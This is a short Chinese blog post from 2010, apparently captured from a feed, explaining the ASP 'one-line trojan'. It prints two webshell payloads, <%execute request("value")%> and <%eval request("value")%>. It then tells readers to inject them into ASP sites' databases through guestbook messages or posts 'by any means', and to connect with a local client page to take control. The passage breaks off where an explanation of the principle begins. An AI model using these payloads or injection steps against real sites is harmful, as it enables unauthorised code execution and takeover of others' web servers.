亲手博客 http://www.qsdiy.net 关注网络,点滴生活! Tue, 16 Mar 2010 12:09:00 +0000 http://wordpress.org/?v=2.9.2 en hourly 1 一句话木马 http://www.qsdiy.net/2010/03/16/%e4%b8%80%e5%8f%a5%e8%af%9d%e6%9c%a8%e9%a9%ac/ http://www.qsdiy.net/2010/03/16/%e4%b8%80%e5%8f%a5%e8%af%9d%e6%9c%a8%e9%a9%ac/#comments Tue, 16 Mar 2010 11:20:39 +0000 如一 http://www.qsdiy.net/?p=881 黑客在注册信息的电子邮箱或者个人主页等中插入类似如下代码:
  <%execute request("value")%>
  <%eval request("value")%>(现在比较多见的,而且字符少,对表单字数有限制的地方特别的实用)
  当知道了数据库的URL,就可以利用本地一张网页进行连接得到Webshell。(不知道数据库也可以,只要知道<%eval request("value")%>这个文件被插入到哪一个ASP文件里面就可以了。)
  这就被称为一句话木马,它是基于B/S结构的。

使用方法
  首先,找到数据库是asp格式的网站,然后,以留言板,或者发表文章的方式,把一句话添加到 asp数据库
  或者加进asp网页.
   记住!我们的目的是把一句话<%execute request("value")%>添加到数据库,无论任何方式!
  然后打开客户端(就是你电脑上面的那个htm文件),填上加入了一句话的asp文件,或者是 asp网页,然后杀进去!,这就可以干你想干的事情了!
  
一句话木马原理

  首先